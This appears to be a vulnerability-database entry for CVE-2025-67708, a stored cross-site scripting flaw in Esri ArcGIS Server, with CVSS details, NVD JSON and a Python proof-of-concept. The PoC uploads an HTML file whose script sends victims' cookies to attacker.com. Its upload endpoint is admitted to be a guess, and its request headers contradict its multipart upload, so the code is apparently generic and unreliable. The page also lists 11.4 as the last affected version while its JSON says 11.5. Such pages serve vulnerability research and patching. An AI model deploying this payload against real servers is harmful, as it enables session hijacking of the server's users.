Security Vulnerability Report
CVE-2025-67708 CVSS 6.1 MEDIUM

CVE-2025-67708

Published: 2025-12-31 23:15:42
Last Modified: 2026-01-06 19:04:53

Description

There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Esri ArcGIS Server <= 11.4 (Windows)
Esri ArcGIS Server <= 11.4 (Linux)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-67708 PoC - Stored XSS in Esri ArcGIS Server
# Target: Esri ArcGIS Server <= 11.4
TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target-arcgis-server:6080"

# Malicious JavaScript payload for XSS
xss_payload = "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>"

def exploit_stored_xss():
    """
    This PoC demonstrates how an unauthenticated attacker can upload files
    containing malicious JavaScript code to ArcGIS Server. The script will be
    stored and executed when victims browse the content.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # Attempt to upload malicious file (specific endpoint may vary)
    upload_endpoint = f"{TARGET}/arcgis/rest/services/upload"
    data = {
        "file": ("malicious.html", xss_payload, "text/html"),
        "description": "Test upload for XSS verification"
    }

    try:
        print(f"[*] Target: {TARGET}")
        print(f"[*] Uploading malicious payload to {upload_endpoint}")
        response = requests.post(upload_endpoint, headers=headers, files=data, timeout=30)
        if response.status_code == 200:
            print("[+] File uploaded successfully")
            print(f"[*] Response: {response.text}")
            print("[*] When victims access the uploaded file, XSS will be triggered")
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67708", "sourceIdentifier": "[email protected]", "published": "2025-12-31T23:15:41.980", "lastModified": "2026-01-06T19:04:52.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser."}, {"lang": "es", "value": "Hay un problema de scripting entre sitios almacenado en Esri ArcGIS Server 11.4 y versiones anteriores en Windows y Linux que en algunas configuraciones permite a un atacante remoto no autenticado almacenar archivos que contienen código malicioso que puede ejecutarse en el contexto del navegador de una víctima."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.5", "matchCriteriaId": "EC44DA7C-0CB3-4D79-B502-2B26954DB4DC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": 
"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}